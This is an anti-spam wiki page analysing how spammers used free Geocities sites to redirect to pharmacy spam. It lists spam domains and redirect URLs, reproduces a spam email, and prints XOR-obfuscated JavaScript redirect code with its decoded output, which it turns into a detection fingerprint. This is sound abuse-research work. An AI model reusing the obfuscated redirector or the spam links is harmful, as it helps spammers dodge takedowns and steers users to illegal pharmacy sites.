Geocities
From Spamwiki
Contents |
[edit] Background
| Yahoo! owns the Geocities offering, a free website provider for home pages and blogs. This offering allows users to register new sites to set up their own site or blog. Because there are no restrictions, anyone can set up any number of sites for no charge.
Once a site is created, the user can simply redirect any visitor to a different web site. Thus, the Yahoo! Geocities site can simply redirect to a spammed site. What is the advantage to spammers? Many of the tools that exist today to report spamvertized web sites, look at the link in the spam message, and report it to the IP address owner (ISP) or the registrar. When the registrars receive these requests, they may remove or suspend the site because it infringes the Terms of Service. But the spammers can create automated scripts that create a new Geocities registration every minute of every hour of every day. And as of March 2008, that is exactly what is happening. Spam runs can now cycle through thousands of redirection names at Geocities, confident that by the time a complaint has gone in to Yahoo!, and the site redirection complaint has been checked and removed by Yahoo! staff, then the damage has already been done. They have moved on to spamming the other thousands of new sites. As the spam runs arrive at various spam traps, these geocities.com redirections can be accumulated and reported. One excellent site performing this service is URIBL.COM. |  |
[edit] Sample redirections
These are the usual redirection target sites, all examples of Canadian Pharmacy. Click on each of these links to display the corresponding McAfee Site Advisor page
- alsopaint.com
- boyiron.com
- clockjoy.com
- coldflat.com
- designrub.com
- developcool.com
- doctorgot.com
- eachhat.com
- earthexact.com
- eastwhat.com
- forwardwish.com
- holesky.com
- industryegg.com
- mainpretty.com
- muchfront.com
- periodpicture.com
- saltoh.com
- sellforest.com
- sincewarm.com
- thereparty.com
- therepresent.com
For example, these Geocities sites redirect to the Canadian Pharmacy site industryegg.com
| geocities.com/adamsmaynard89 | geocities.com/lorettafierros350475 | geocities.com/olivermcintosh38 |
| geocities.com/sharilong29 | geocities.com/reidmcconnell80 | geocities.com/teddycampbell49 |
[edit] Sample Spam
Return-Path: <opfpsalms@burbidgeandmitchell.com>
Received: from edge5.adelphia.net ([61.185.202.118]) by mta6.adelphia.net
(InterMail vM.6.01.05.02 201-2131-123-102-20050715) with ESMTP
id <20080503164506.RQUK21044.mta6.adelphia.net@edge5.adelphia.net>;
Sat, 3 May 2008 12:45:06 -0400
Received: from [210.72.148.218] (really [61.185.202.118])
by edge5.adelphia.net
(InterMail vG.2.00.00.02 201-2161-108-103-20050713) with ESMTP
id <20080503165035.EQB1743.edge5.adelphia.net@[210.72.148.218]>;
Sat, 3 May 2008 12:50:35 -0400
Message-ID: <001101c8ad81$0a4ffda0$00de72a4@WWW7EE2BF3DA56>
From: "Isiah Bower" <opfpsalms@burbidgeandmitchell.com>
To: "obfuscated" <obfuscated@adelphia.net>
Subject: New pharm items
Date: Sun, 4 May 2008 00:51:51 +0800
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_000E_01C8AD81.0A4FFDA0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2720.2963
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2720.2963
X-EsetId: 4793932BEBD6303712D7
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=Windows-1252">
<META content="MSHTML 6.00.2720.2963" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<BR><BR><BR>
<DIV align=left><FONT face=Georgia color=#FF0033 size=5><EM>Becoming a man has always wanted to be</EM></DIV>
<DIV><FONT face=Georgia size=4></FONT> </DIV>
<DIV align=left><FONT face=Georgia color=#000066 size=4>Not so good place to buy pills?...</FONT></DIV>
<BR><BR>
<DIV align=left><FONT face=Georgia color=#000066 size=4>The best prices you ever seen...</FONT></DIV>
<BR>
<DIV align=left><FONT face=Georgia size=4><A href="http://geocities.com/erickrodriquez23">Limited offer here...</A></FONT></DIV>
<DIV><FONT face=Georgia size=4></FONT> </DIV>
</BODY></HTML>
--- End of Mail Submission ---
[edit] Analysis of redirections
[edit] Sample 1
http://geocities.com/robertbarber61/
loads site: http://us.geocities.com/robertbarber61/index.html
fetched page contains Java Script:
var crfxd='lsbyfleuboftmegvoxgvb';
var heiupdk=0;
var dbxetp, plhk, edko='5000010B0F1C11550E0E081318040013525A2D17140D20010B0F1C11575C180F1A090A105
81B1717580E0310030D0F030B5B0A1D03124D584751070C130658435C071814180D101A0E05004306081B48435B59110F010B091252';
plhk=;
var ixhr;
for( dbxetp=0;
dbxetp < oedko.length;
dbxetp+=2){ixhr = unescape( '%' + oedko.substr( dbxetp,2));
plhk += String.fromCharCode( ixhr.charCodeAt(0) ^ crfxd.charCodeAt(heiupdk++) );
if ( heiupdk >= crfxd.length ) heiupdk = 0;
}document.write(plhk);
which decodes to:
window.top.location.href = 'http://earthexact.com';
which redirects to a Canadian Pharmacy illegal web site.
[edit] Sample 2
http://geocities.com/mariomoon81/
loads site: http://us.geocities.com/mariomoon81/index.html
fetched page contains Java Script:
var mbgcnit='iagitkdmlhaod';
var scgyyva=0;
var hdepof, lnkgo, itzkqv='5512041B1D1B104D00090F0811080602545621051B0D3B021D0D1915455703020A0903
1F4F1B0B194F0B06170A100403064F07160C074754544C0C1918185B404B0C00151D1C0E1C0C0F1C4F0C0B04465C555B18071F05181551';
lnkgo=;
var mqazm;
for( hdepof=0;
hdepof < itzkqv.length;
hdepof+=2){mqazm = unescape( '%' + itzkqv.substr( hdepof,2));
lnkgo += String.fromCharCode( mqazm.charCodeAt(0) ^ mbgcnit.charCodeAt(scgyyva++) );
if ( scgyyva >= mbgcnit.length ) scgyyva = 0;
}document.write(lnkgo);
which decodes to:
window.top.location.href = 'http://earthexact.com';
which redirects to a Canadian Pharmacy illegal web site.
[edit] Fingerprint
Note that although the variables in the Java Script code are different for identical redirections, the coding logic is the same. It is therefore simple to build a fingerprint of the redirection code. This fingerprint can be used to detect and remove all such obfuscated redirections.
var mbgcnit='iagitkdmlhaod';
var scgyyva=0;
var hdepof, lnkgo, itzkqv='5512041B1D1B104D00090F0811080602545621051B0D3B021D0D1915455703020A0903
1F4F1B0B194F0B06170A100403064F07160C074754544C0C1918185B404B0C00151D1C0E1C0C0F1C4F0C0B04465C555B18071F05181551';
lnkgo=;
var mqazm;
for( hdepof=0;
hdepof < itzkqv.length;
hdepof+=2){mqazm = unescape( '%' + itzkqv.substr( hdepof,2));
lnkgo += String.fromCharCode( mqazm.charCodeAt(0) ^ mbgcnit.charCodeAt(scgyyva++) );
if ( scgyyva >= mbgcnit.length ) scgyyva = 0;
}document.write(lnkgo);
[edit] Remedies
In section 5 MEMBER CONDUCT of its Terms of Service, Yahoo! Geocities has clauses that these redirections violate, and in section 12 TERMINATION there is the right to terminate. Yahoo! Geocities has both a legal right to terminate all of these violations, and a legal obligation to do so. Geocities Terms of Service especially section 12, Termination.
The fingerprint method described above must be implemented on a continuing basis to remove all previously spammed Geocities redirections sites, and any future registered sites that adopt the same method.
[edit] Reporting Geocities violations
There is an online page for reporting abuse
[edit] Related redirection abuse
The URIBL tracking site allows a comparison between Yahoo! Geocities abuse rates and other free site providers such as Google Blogspot
